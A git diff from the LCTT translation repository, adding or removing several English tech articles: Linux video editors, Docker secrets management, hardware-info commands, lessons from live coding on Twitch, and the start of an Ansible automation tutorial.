If you are using Ubuntu-based Linux distributions, you can use the official PPA:
|
||||
```
|
||||
sudo add-apt-repository ppa:ozmartian/apps
|
||||
sudo apt-get update
|
||||
sudo apt-get install vidcutter
|
||||
```
|
||||
|
||||
It is available in AUR so Arch Linux users can also install it easily. For other Linux distributions, you can find the installation files on its [GitHub page][45].
|
||||
|
||||
### Which is the best video editing software for Linux?
|
||||
|
||||
A number of video editors mentioned here use [FFmpeg][46]. You can use FFmpeg on your own as well. It's a command line only tool so I didn't include it in the main list but it would have been unfair to not mention it at all.
|
||||
|
||||
If you need an editor for simply cutting and joining videos, go with VidCutter.
|
||||
|
||||
If you need something more than that, **OpenShot** or **Kdenlive** is a good choice. These are suitable for beginners and a system with standard specification.
|
||||
|
||||
If you have a high-end computer and need advanced features you can go out with **Lightworks** or **DaVinci Resolve**. If you are looking for more advanced features for 3D works, **Blender** has got your back.
|
||||
|
||||
So that's all I can write about the **best video editing software for Linux** such as Ubuntu, Linux Mint, Elementary, and other Linux distributions. Share with us which video editor you like the most.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://itsfoss.com/best-video-editing-software-linux/
|
||||
|
||||
作者:[It'S Foss Team][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://itsfoss.com/author/itsfoss/
|
||||
[1]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=
|
||||
[2]:https://itsfoss.com/wp-content/uploads/2016/06/best-Video-editors-Linux-800x450.png
|
||||
[3]:https://itsfoss.com/linux-photo-management-software/
|
||||
[4]:https://itsfoss.com/best-modern-open-source-code-editors-for-linux/
|
||||
[5]:https://itsfoss.com/wp-content/uploads/2016/06/kdenlive-free-video-editor-on-ubuntu.jpg
|
||||
[6]:https://kdenlive.org/
|
||||
[7]:https://itsfoss.com/tag/open-source/
|
||||
[8]:https://www.kde.org/
|
||||
[9]:https://kdenlive.org/download/
|
||||
[10]:https://itsfoss.com/wp-content/uploads/2016/06/openshot-free-video-editor-on-ubuntu.jpg
|
||||
[11]:http://www.openshot.org/
|
||||
[12]:http://www.openshot.org/user-guide/
|
||||
[13]:http://www.openshot.org/download/
|
||||
[14]:https://itsfoss.com/wp-content/uploads/2016/06/shotcut-video-editor-linux-800x503.jpg
|
||||
[15]:https://www.shotcut.org/
|
||||
[16]:https://www.shotcut.org/tutorials/
|
||||
[17]:https://www.shotcut.org/features/
|
||||
[18]:https://itsfoss.com/use-snap-packages-ubuntu-16-04/
|
||||
[19]:https://www.shotcut.org/download/
|
||||
[20]:https://itsfoss.com/wp-content/uploads/2016/06/flowblade-movie-editor-on-ubuntu.jpg
|
||||
[21]:http://jliljebl.github.io/flowblade/
|
||||
[22]:https://jliljebl.github.io/flowblade/webhelp/help.html
|
||||
[23]:https://jliljebl.github.io/flowblade/webhelp/proxy.html
|
||||
[24]:https://jliljebl.github.io/flowblade/features.html
|
||||
[25]:https://jliljebl.github.io/flowblade/download.html
|
||||
[26]:https://itsfoss.com/wp-content/uploads/2016/06/lightworks-running-on-ubuntu-16.04.jpg
|
||||
[27]:https://www.lwks.com/
|
||||
[28]:https://en.wikipedia.org/wiki/Non-linear_editing_system
|
||||
[29]:https://www.lwks.com/index.php?option=com_lwks&view=download&Itemid=206&tab=4
|
||||
[30]:https://www.lwks.com/videotutorials
|
||||
[31]:https://www.lwks.com/index.php?option=com_lwks&view=download&Itemid=206&tab=1
|
||||
[32]:https://itsfoss.com/wp-content/uploads/2016/06/blender-running-on-ubuntu-16.04.jpg
|
||||
[33]:https://www.blender.org/
|
||||
[34]:https://www.blender.org/features/
|
||||
[35]:https://www.blender.org/download/
|
||||
[36]:https://itsfoss.com/wp-content/uploads/2016/06/cinelerra-screenshot.jpeg
|
||||
[37]:http://cinelerra.org/
|
||||
[38]:http://cinelerra.org/our-story
|
||||
[39]:https://sourceforge.net/projects/heroines/files/cinelerra-6-src.tar.xz/download
|
||||
[40]:http://cinelerra.org/download
|
||||
[41]:https://itsfoss.com/wp-content/uploads/2016/06/davinci-resolve-vdeo-editor-800x450.jpg
|
||||
[42]:https://www.blackmagicdesign.com/products/davinciresolve/
|
||||
[43]:https://itsfoss.com/wp-content/uploads/2016/06/vidcutter-screenshot-800x585.jpeg
|
||||
[44]:https://itsfoss.com/vidcutter-video-editor-linux/
|
||||
[45]:https://github.com/ozmartian/vidcutter/releases
|
||||
[46]:https://www.ffmpeg.org/
|
@ -1,113 +0,0 @@
|
||||
|
||||
translating by HardworkFish
|
||||
|
||||
INTRODUCING DOCKER SECRETS MANAGEMENT
|
||||
============================================================
|
||||
|
||||
Containers are changing how we view apps and infrastructure. Whether the code inside containers is big or small, container architecture introduces a change to how that code behaves with hardware – it fundamentally abstracts it from the infrastructure. Docker believes that there are three key components to container security and together they result in inherently safer apps.
|
||||
|
||||
![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1)
|
||||
|
||||
A critical element of building safer apps is having a secure way of communicating with other apps and systems, something that often requires credentials, tokens, passwords and other types of confidential information—usually referred to as application secrets. We are excited to introduce Docker Secrets, a container native solution that strengthens the Trusted Delivery component of container security by integrating secret distribution directly into the container platform.
|
||||
|
||||
With containers, applications are now dynamic and portable across multiple environments. This made existing secrets distribution solutions inadequate because they were largely designed for static environments. Unfortunately, this led to an increase in mismanagement of application secrets, making it common to find insecure, home-grown solutions, such as embedding secrets into version control systems like GitHub, or other equally bad—bolted on point solutions as an afterthought.
|
||||
|
||||
### Introducing Docker Secrets Management
|
||||
|
||||
We fundamentally believe that apps are safer if there is a standardized interface for accessing secrets. Any good solution will also have to follow security best practices, such as encrypting secrets while in transit; encrypting secrets at rest; preventing secrets from unintentionally leaking when consumed by the final application; and strictly adhere to the principle of least-privilege, where an application only has access to the secrets that it needs—no more, no less.
|
||||
|
||||
By integrating secrets into Docker orchestration, we are able to deliver a solution for the secrets management problem that follows these exact principles.
|
||||
|
||||
The following diagram provides a high-level view of how the Docker swarm mode architecture is applied to securely deliver a new type of object to our containers: a secret object.
|
||||
|
||||
![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1)
|
||||
|
||||
In Docker, a secret is any blob of data, such as a password, SSH private key, TLS Certificate, or any other piece of data that is sensitive in nature. When you add a secret to the swarm (by running `docker secret create`), Docker sends the secret over to the swarm manager over a mutually authenticated TLS connection, making use of the [built-in Certificate Authority][17] that gets automatically created when bootstrapping a new swarm.
|
||||
|
||||
```
|
||||
$ echo "This is a secret" | docker secret create my_secret_data -
|
||||
```
|
||||
|
||||
Once the secret reaches a manager node, it gets saved to the internal Raft store, which uses NACL's Salsa20Poly1305 with a 256-bit key to ensure no data is ever written to disk unencrypted. Writing to the internal store gives secrets the same high availability guarantees that the rest of the swarm management data gets.
|
||||
|
||||
When a swarm manager starts up, the encrypted Raft logs containing the secrets is decrypted using a data encryption key that is unique per-node. This key, and the node’s TLS credentials used to communicate with the rest of the cluster, can be encrypted with a cluster-wide key encryption key, called the unlock key, which is also propagated using Raft and will be required on manager start.
|
||||
|
||||
When you grant a newly-created or running service access to a secret, one of the manager nodes (only managers have access to all the stored secrets stored) will send it over the already established TLS connection exclusively to the nodes that will be running that specific service. This means that nodes cannot request the secrets themselves, and will only gain access to the secrets when provided to them by a manager – strictly for the services that require them.
|
||||
|
||||
```
|
||||
$ docker service create --name="redis" --secret="my_secret_data" redis:alpine
|
||||
```
|
||||
|
||||
The unencrypted secret is mounted into the container in an in-memory filesystem at /run/secrets/<secret_name>.
|
||||
|
||||
```
|
||||
$ docker exec $(docker ps --filter name=redis -q) ls -l /run/secrets
|
||||
total 4
|
||||
-r--r--r-- 1 root root 17 Dec 13 22:48 my_secret_data
|
||||
```
|
||||
|
||||
If a service gets deleted, or rescheduled somewhere else, the manager will immediately notify all the nodes that no longer require access to that secret to erase it from memory, and the node will no longer have any access to that application secret.
|
||||
|
||||
```
|
||||
$ docker service update --secret-rm="my_secret_data" redis
|
||||
|
||||
$ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret_data
|
||||
|
||||
cat: can't open '/run/secrets/my_secret_data': No such file or directory
|
||||
```
|
||||
|
||||
Check out the [Docker secrets docs][18] for more information and examples on how to create and manage your secrets. And a special shout out to [Laurens Van Houtven][19] (https://www.lvh.io/) in collaboration with the Docker security and core engineering team to help make this feature a reality.
|
||||
|
||||
[Get safer apps for dev and ops w/ new #Docker secrets management][5]
|
||||
|
||||
[CLICK TO TWEET][6]
|
||||
|
||||
###
|
||||
![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/Screenshot-2017-02-08-23.30.13.png?resize=1032%2C111&ssl=1)
|
||||
|
||||
### Safer Apps with Docker
|
||||
|
||||
Docker secrets is designed to be easily usable by developers and IT ops teams to build and run safer apps. Docker secrets is a container first architecture designed to keep secrets safe and used only when needed by the exact container that needs that secret to operate. From defining apps and secrets with Docker Compose through an IT admin deploying that Compose file directly in Docker Datacenter, the services, secrets, networks and volumes will travel securely, safely with the application.
|
||||
|
||||
Resources to learn more:
|
||||
|
||||
* [Docker Datacenter on 1.13 with Secrets, Security Scanning, Content Cache and More][7]
|
||||
|
||||
* [Download Docker][8] and get started today
|
||||
|
||||
* [Try secrets in Docker Datacenter][9]
|
||||
|
||||
* [Read the Documentation][10]
|
||||
|
||||
* Attend an [upcoming webinar][11]
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://blog.docker.com/2017/02/docker-secrets-management/
|
||||
|
||||
作者:[ Ying Li][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://blog.docker.com/author/yingli/
|
||||
[1]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management&summary=Containers%20are%20changing%20how%20we%20view%20apps%20and%20infrastructure.%20Whether%20the%20code%20inside%20containers%20is%20big%20or%20small,%20container%20architecture%20introduces%20a%20change%20to%20how%20that%20code%20behaves%20with%20hardware%20-%20it%20fundamentally%20abstracts%20it%20from%20the%20infrastructure.%20Docker%20believes%20that%20there%20are%20three%20key%20components%20to%20container%20security%20and%20...
|
||||
[2]:http://www.reddit.com/submit?url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management
|
||||
[3]:https://plus.google.com/share?url=http://dockr.ly/2k6gnOB
|
||||
[4]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2k6gnOB&t=Introducing%20Docker%20Secrets%20Management
|
||||
[5]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB
|
||||
[6]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB
|
||||
[7]:http://dockr.ly/AppSecurity
|
||||
[8]:https://www.docker.com/getdocker
|
||||
[9]:http://www.docker.com/trial
|
||||
[10]:https://docs.docker.com/engine/swarm/secrets/
|
||||
[11]:http://www.docker.com/webinars
|
||||
[12]:https://blog.docker.com/author/yingli/
|
||||
[13]:https://blog.docker.com/tag/container-security/
|
||||
[14]:https://blog.docker.com/tag/docker-security/
|
||||
[15]:https://blog.docker.com/tag/secrets-management/
|
||||
[16]:https://blog.docker.com/tag/security/
|
||||
[17]:https://docs.docker.com/engine/swarm/how-swarm-mode-works/pki/
|
||||
[18]:https://docs.docker.com/engine/swarm/secrets/
|
||||
[19]:https://lvh.io%29/
|
@ -0,0 +1,98 @@
|
||||
translating---geekpi
|
||||
|
||||
Commands to check System & Hardware Information
|
||||
======
|
||||
Hello Linux-fanatics, in this post I will be discussing some important commands that will make your life as a System Administrator easier. As we all know, being a good System Administrator means knowing everything about your IT infrastructure and having all the information about your servers, whether it's hardware or OS. So the following commands will help you extract all the hardware & system information.
|
||||
|
||||
#### 1- Viewing system information
|
||||
|
||||
$ uname -a
|
||||
|
||||
![uname command][2]
|
||||
|
||||
It will provide you all the information about your system. It will provide you with Kernel name of system, Hostname, Kernel version, Kernel Release, Hardware name.
|
||||
|
||||
#### 2- Viewing Hardware information
|
||||
|
||||
$ lshw
|
||||
|
||||
![lshw command][4]
|
||||
|
||||
Using lshw will show you all the Hardware information on your screen.
|
||||
|
||||
#### 3- Viewing Block Devices(Hard disks, Flash drives) information
|
||||
|
||||
$ lsblk
|
||||
|
||||
![lsblk command][6]
|
||||
|
||||
lsblk command prints all the information regarding block devices on screen. Use lsblk -a to show all the block devices.
|
||||
|
||||
#### 4- Viewing CPU information
|
||||
|
||||
$ lscpu
|
||||
|
||||
![lscpu command][8]
|
||||
|
||||
lscpu shows all the CPU information on screen.
|
||||
|
||||
#### 5- Viewing PCI information
|
||||
|
||||
$ lspci
|
||||
|
||||
![lspci command][10]
|
||||
|
||||
All the network adapter cards, USB cards, and graphics cards are termed PCIs. To view their information, use lspci.
|
||||
|
||||
lspci -v will give detailed information regarding PCI cards.
|
||||
|
||||
lspci -t will show them in tree format.
|
||||
|
||||
#### 6- Viewing USB information
|
||||
|
||||
$ lsusb
|
||||
|
||||
![lsusb command][12]
|
||||
|
||||
To view information regarding all USB controllers & devices connected to them, we use lsusb
|
||||
|
||||
#### 7- Viewing SCSI information
|
||||
|
||||
$ lsscsi
|
||||
|
||||
![lsscsi][14]
|
||||
|
||||
To view SCSI information, type lsscsi. lsscsi -s will also show the size of the partitions.
|
||||
|
||||
#### 8- Viewing file system information
|
||||
|
||||
$ fdisk -l
|
||||
|
||||
![fdisk command][16]
|
||||
|
||||
Using fdisk -l will show information regarding the file system. Although the main function of the fdisk utility is to modify the file system, you can also create new partitions and delete old ones (more on that in a future tutorial).
|
||||
|
||||
That's it for now, my fellow Linux-fanatics. You are advised to check out my other posts regarding Linux commands **[HERE][17]** & another one **[HERE][18]**.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://linuxtechlab.com/commands-system-hardware-info/
|
||||
|
||||
作者:[Shusain][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://linuxtechlab.com/author/shsuain/
|
||||
[2]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/uname.jpg?resize=664%2C69
|
||||
[4]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lshw.jpg?resize=641%2C386
|
||||
[6]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsblk.jpg?resize=646%2C162
|
||||
[8]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lscpu.jpg?resize=643%2C216
|
||||
[10]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lspci.jpg?resize=644%2C238
|
||||
[12]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsusb.jpg?resize=645%2C37
|
||||
[14]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsscsi.jpg?resize=639%2C110
|
||||
[16]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fdisk.jpg?resize=656%2C335
|
||||
[17]:http://linuxtechlab.com/linux-commands-beginners-part-1/
|
||||
[18]:http://linuxtechlab.com/linux-commands-beginners-part-2/
|
@ -1,165 +0,0 @@
|
||||
Translating by lonaparte
|
||||
|
||||
Lessons from my first year of live coding on Twitch
|
||||
============================================================
|
||||
|
||||
I gave streaming a go for the first time last July. Instead of gaming, which the majority of streamers on Twitch do, I wanted to stream the open source work I do in my personal time. I work on NodeJS hardware libraries a fair bit (most of them my own). Given that I was already in a niche on Twitch, why not be in an even smaller niche, like JavaScript powered hardware ;) I signed up for [my own channel][1], and have been streaming regularly since.
|
||||
|
||||
Of course I’m not the first to do this. [Handmade Hero][2] was one of the first programmers I watched code online, quickly followed by the developers at Vlambeer who [developed Nuclear Throne live on Twitch][3]. I was fascinated by Vlambeer especially.
|
||||
|
||||
What tipped me over the edge of _wishing_ I could do it to _actually doing it_ is credited to [Nolan Lawson][4], a friend of mine. I watched him [streaming his open source work one weekend][5], and it was awesome. He explained everything he was doing along the way. Everything. Replying to issues on GitHub, triaging bugs, debugging code in branches, you name it. I found it fascinating, as Nolan maintains open source libraries that get a lot of use and activity. His open source life is very different to mine.
|
||||
|
||||
You can even see this comment I left under his video:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*tm8xC8CJV9ZimCCI.png)
|
||||
|
||||
I gave it a go myself a week or so later, after setting up my Twitch channel and bumbling my way through using OBS. I believe I worked on [Avrgirl-Arduino][6], which I still frequently work on while streaming. It was a rough first stream. I was very nervous, and I had stayed up late rehearsing everything I was going to do the night before.
|
||||
|
||||
The tiny number of viewers I got that Saturday were really encouraging though, so I kept at it. These days I have more than a thousand followers, and a lovely subset of them are regular visitors who I call “the noopkat fam”.
|
||||
|
||||
We have a lot of fun, and I like to call the live coding parts “massively multiplayer online pair programming”. I am truly touched by the kindness and wit of everyone joining me each weekend. One of the funniest moments I have had was when one of the fam pointed out that my Arduino board was not working with my software because the microchip was missing from the board:
|
||||
|
||||
|
||||
I have logged off a stream many a time, only to find in my inbox that someone has sent a pull request for some work that I had mentioned I didn’t have the time to start on. I can honestly say that my open source work has been changed for the better, thanks to the generosity and encouragement of my Twitch community.
|
||||
|
||||
I have so much more to say about the benefits that streaming on Twitch has brought me, but that’s for another blog post probably. Instead, I want to share the lessons I have learned for anyone else who would like to try live coding in this way for themselves. Recently I’ve been asked by a few developers how they can get started, so I’m publishing the same advice I have given them!
|
||||
|
||||
Firstly, I’m linking you to a guide called [“Streaming and Finding Success on Twitch”][7] which helped me a lot. It’s focused towards Twitch and gaming streams specifically, but there are still relevant sections and great advice in there. I’d recommend reading this first before considering any other details about starting your channel (like equipment or software choices).
|
||||
|
||||
My own advice is below, which I have acquired from my own mistakes and the sage wisdom of fellow streamers (you know who you are!).
|
||||
|
||||
### Software
|
||||
|
||||
There’s a lot of free streaming software out there to stream with. I use [Open Broadcaster Software (OBS)][8]. It’s available on most platforms. I found it really intuitive to get up and going, but others sometimes take a while to learn how it works. Your mileage may vary! Here is a screen-grab of what my OBS ‘desktop scene’ setup looks like as of today (click for larger image):
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*s4wyeYuaiThV52q5.png)
|
||||
|
||||
You essentially switch between ‘scenes’ while streaming. A scene is a collection of ‘sources’, layered and composited with each other. A source can be things like a camera, microphone, your desktop, a webpage, live text, images, the list goes on. OBS is very powerful.
|
||||
|
||||
This desktop scene above is where I do all of my live coding, and I mostly live here for the duration of the stream. I use iTerm and vim, and also have a browser window handy to switch to in order to look up documentation and triage things on GitHub, etc.
|
||||
|
||||
The bottom black rectangle is my webcam, so folks can see me work and have a more personal connection.
|
||||
|
||||
I have a handful of ‘labels’ for my scenes, many of which are to do with the stats and info in the top banner. The banner just adds personality, and is a nice persistent source of info while streaming. It’s an image I made in [GIMP][9], and you import it as a source in your scene. Some labels are live stats that pull from text files (such as most recent follower). Another label is a [custom one I made][10] which shows the live temperature and humidity of the room I stream from.
|
||||
|
||||
I have also ‘alerts’ set up in my scenes, which show cute banners over the top of my stream whenever someone follows or donates money. I use the web service [Stream Labs][11] to do this, importing it as a browser webpage source into the scene. Stream Labs also creates my recent followers live text file to show in my banner.
|
||||
|
||||
I also have a standby screen that I use when I’m about to be live:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*cbkVjKpyWaWZLSfS.png)
|
||||
|
||||
I additionally need a scene for when I’m entering secret tokens or API keys. It shows me on the webcam but hides my desktop with an entertaining webpage, so I can work in privacy:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*gbhowQ37jr3ouKhL.png)
|
||||
|
||||
As you can see, I don’t take stuff too seriously when streaming, but I like to have a good setup for my viewers to get the most out of my stream.
|
||||
|
||||
But now for an actual secret: I use OBS to crop out the bottom and right edges of my screen, while keeping the same video size ratio as what Twitch expects. That leaves me with space to watch my events (follows, etc) on the bottom, and look at and respond to my channel chat box on the right. Twitch allows you to ‘pop out’ the chatbox in a new window which is really helpful.
|
||||
|
||||
This is what my full desktop _really_ looks like:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*sENLkp3Plh7ZTjJt.png)
|
||||
|
||||
I started doing this a few months ago and haven’t looked back. I’m not even sure my viewers realise this is how my setup works. I think they take for granted that I can see everything, even though I cannot see what is actually being streamed live when I’m busy programming!
|
||||
|
||||
You might be wondering why I only use one monitor. It’s because two monitors was just too much to manage on top of everything else I was doing while streaming. I figured this out quickly and have stuck with one screen since.
|
||||
|
||||
### Hardware
|
||||
|
||||
I used cheaper stuff to start out, and slowly bought nicer stuff as I realised that streaming was going to be something I stuck with. Use whatever you have when getting started, even if it’s your laptop’s built in microphone and camera.
|
||||
|
||||
Nowadays I use a Logitech Pro C920 webcam, and a Blue Yeti microphone on a microphone arm with a mic shock. Totally worth the money in the end if you have it to spend. It made a difference to the quality of my streams.
|
||||
|
||||
I use a large monitor (27"), because as I mentioned earlier using two monitors just didn’t work for me. I was missing things in the chat because I was not looking over to the second laptop screen enough, etc etc. Your mileage may vary here, but having everything on one screen was key for me to pay attention to everything happening.
|
||||
|
||||
That’s pretty much it on the hardware side; I don’t have a very complicated setup.
|
||||
|
||||
If you were interested, my desk looks pretty normal except for the obnoxious looming microphone:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*EyRimlrHNEKeFmS4.jpg)
|
||||
|
||||
### Tips
|
||||
|
||||
This last section has some general tips I’ve picked up, that have made my stream better and more enjoyable overall.
|
||||
|
||||
#### Panels
|
||||
|
||||
Spend some time on creating great panels. Panels are the little content boxes on the bottom of everyone’s channel page. I see them as the new MySpace profile boxes (lol but really). Panel ideas could be things like chat rules, information about when you stream, what computer and equipment you use, your favourite cat breed; anything that creates a personal touch. Look at other channels (especially popular ones) for ideas!
|
||||
|
||||
An example of one of my panels:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*HlLs6xlnJtPwN4D6.png)
|
||||
|
||||
#### Chat
|
||||
|
||||
Chat is really important. You’re going to get the same questions over and over as people join your stream halfway through, so having chat ‘macros’ can really help. “What are you working on?” is the most common question asked while I’m coding. I have chat shortcut ‘commands’ for that, which I made with [Nightbot][12]. It will put an explanation of something I have entered in ahead of time, by typing a small one word command like _!whatamidoing_
|
||||
|
||||
When folks ask questions or leave nice comments, talk back to them! Say thanks, say their Twitch handle, and they’ll really appreciate the attention and acknowledgement. This is SUPER hard to stay on top of when you first start streaming, but multitasking will come easier as you do more. Try to take a few seconds every couple of minutes to look at the chat for new messages.
|
||||
|
||||
When programming, _explain what you’re doing_ . Talk a lot. Make jokes. Even when I’m stuck, I’ll say, “oh, crap, I forget how to use this method lemme Google it hahaha” and folks are always nice and sometimes they’ll even read along with you and help you out. It’s fun and engaging, and keeps folks watching.
|
||||
|
||||
I lose interest quickly when I’m watching programming streams where the streamer is sitting in silence typing code, ignoring the chat and their new follower alerts.
|
||||
|
||||
It’s highly likely that 99% of folks who find their way to your channel will be friendly and curious. I get the occasional troll, but the moderation tools offered by Twitch and Nightbot really help to discourage this.
|
||||
|
||||
#### Prep time
|
||||
|
||||
Automate your setup as much as possible. My terminal is iTerm, and it lets you save window arrangements and font sizes so you can restore back to them later. I have one window arrangement for streaming and one for non streaming. It’s a massive time saver. I hit one command and everything is the perfect size and in the right position, ready to go.
|
||||
|
||||
There are other apps out there that automate all of your app window placements, have a look to see if any of them would also help.
|
||||
|
||||
Make your font size really large in your terminal and code editor so everyone can see.
|
||||
|
||||
#### Regularity
|
||||
|
||||
Be regular with your schedule. I only stream once a week, but always at the same time. Let folks know if you’re not able to stream during an expected time you normally do. This has netted me a regular audience. Some folks love routine and it’s exactly like catching up with a friend. You’re in a social circle with your community, so treat it that way.
|
||||
|
||||
I want to stream more often, but I know I can’t commit to more than once a week because of travel. I am trying to come up with a way to stream in high quality when on the road, or perhaps just have casual chats and save programming for my regular Sunday stream. I’m still trying to figure this out!
|
||||
|
||||
#### Awkwardness
|
||||
|
||||
It’s going to feel weird when you get started. You’re going to feel nervous about folks watching you code. That’s normal! I felt that really strongly at the beginning, even though I have public speaking experience. I felt like there was nowhere for me to hide, and it scared me. I thought, “everyone is going to think my code is bad, and that I’m a bad developer”. This is a thought pattern that has plagued me my _entire career_ though, it’s nothing new. I knew that with this, I couldn’t quietly refactor code before pushing to GitHub, which is generally much safer for my reputation as a developer.
|
||||
|
||||
I learned a lot about my programming style by live coding on Twitch. I learned that I’m definitely the “make it work, then make it readable, then make it fast” type. I don’t rehearse the night before anymore (I gave that up after 3 or 4 streams right at the beginning), so I write pretty rough code on Twitch and have to be okay with that. I write my best code when alone with my thoughts and not watching a chat box + talking aloud, and that’s okay. I forget method signatures that I’ve used a thousand times, and make ‘silly’ mistakes in almost every single stream. For most, it’s not a productive environment for being at your best.
|
||||
|
||||
My Twitch community never judges me for this, and they help me out a lot. They understand I’m multitasking, and are really great about pragmatic advice and suggestions. Sometimes they bail me out, and other times I have to explain to them why their suggestion won’t work. It’s really just like regular pair programming!
|
||||
|
||||
I think the ‘warts and all’ approach to this medium is a strength, not a weakness. It makes you more relatable, and it’s important to show that there’s no such thing as the perfect programmer, or the perfect code. It’s probably quite refreshing for new coders to see, and humbling for myself as a more experienced coder.
|
||||
|
||||
### Conclusion
|
||||
|
||||
If you’ve been wanting to get into live coding on Twitch, I encourage you to give it a try! I hope this post helped you if you have been wondering where to start.
|
||||
|
||||
If you’d like to join me on Sundays, you can [follow my channel on Twitch][13] :)
|
||||
|
||||
On my last note, I’d like to personally thank [Mattias Johansson][14] for his wisdom and encouragement early on in my streaming journey. He was incredibly generous, and his [FunFunFunction YouTube channel][15] is a continuous source of inspiration.
|
||||
|
||||
Update: a bunch of folks have been asking about my keyboard and other parts of my workstation. [Here is the complete list of what I use][16]. Thanks for the interest!
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://medium.freecodecamp.org/lessons-from-my-first-year-of-live-coding-on-twitch-41a32e2f41c1
|
||||
|
||||
作者:[ Suz Hinton][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://medium.freecodecamp.org/@suzhinton
|
||||
[1]:https://www.twitch.tv/noopkat
|
||||
[2]:https://www.twitch.tv/handmade_hero
|
||||
[3]:http://nuclearthrone.com/twitch/
|
||||
[4]:https://twitter.com/nolanlawson
|
||||
[5]:https://www.youtube.com/watch?v=9FBvpKllTQQ
|
||||
[6]:https://github.com/noopkat/avrgirl-arduino
|
||||
[7]:https://www.reddit.com/r/Twitch/comments/4eyva6/a_guide_to_streaming_and_finding_success_on_twitch/
|
||||
[8]:https://obsproject.com/
|
||||
[9]:https://www.gimp.org/
|
||||
[10]:https://github.com/noopkat/study-temp
|
||||
[11]:https://streamlabs.com/
|
||||
[12]:https://beta.nightbot.tv/
|
||||
[13]:https://www.twitch.tv/noopkat
|
||||
[14]:https://twitter.com/mpjme
|
||||
[15]:https://www.youtube.com/channel/UCO1cgjhGzsSYb1rsB4bFe4Q
|
||||
[16]:https://gist.github.com/noopkat/5de56cb2c5917175c5af3831a274a2c8
|
@ -0,0 +1,298 @@
|
||||
translating by lujun9972
|
||||
How to automate your system administration tasks with Ansible
|
||||
======
|
||||
![配图](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_google_wave.png?itok=2oh8TpUi)
|
||||
Do you want to sharpen your system administration or Linux skills? Perhaps you have some stuff running on your local LAN and you want to make your life easier--where do you begin? In this article, I'll explain how to set up tooling to simplify administering multiple machines.
|
||||
|
||||
When it comes to remote administration tools, SaltStack, Puppet, Chef, and [Ansible][1] are a few popular options. Throughout this article, I'll focus on Ansible and explain how it can be helpful whether you have 5 virtual machines or 1,000.
|
||||
|
||||
Our journey begins with the basic administration of multiple machines, whether they are virtual or physical. I will assume you have an idea of what you want to achieve, and basic Linux administration skills (or at least the ability to look up the steps required to perform each task). I will show you how to use the tools, and it is up to you to decide what to do with them.
|
||||
|
||||
### What is Ansible?
|
||||
|
||||
The Ansible website explains the project as "a radically simple IT automation engine that automates cloud provisioning, configuration management, application deployment, intra-service orchestration, and many other IT needs." Ansible can be used to perform the same tasks across a defined set of servers from a centralized location.
|
||||
|
||||
If you are familiar with Bash for-loops, you'll find that Ansible operates in a similar fashion. The difference, however, is that Ansible is _idempotent_. In layman's terms this means that generally Ansible only performs the requested action if a change will occur as a result. For example, if you were to perform a Bash for-loop to create a user across all of your machines, it may look something like this:
|
||||
```
|
||||
for server in serverA serverB serverC; do ssh ${server} "useradd myuser"; done
|
||||
```
|
||||
|
||||
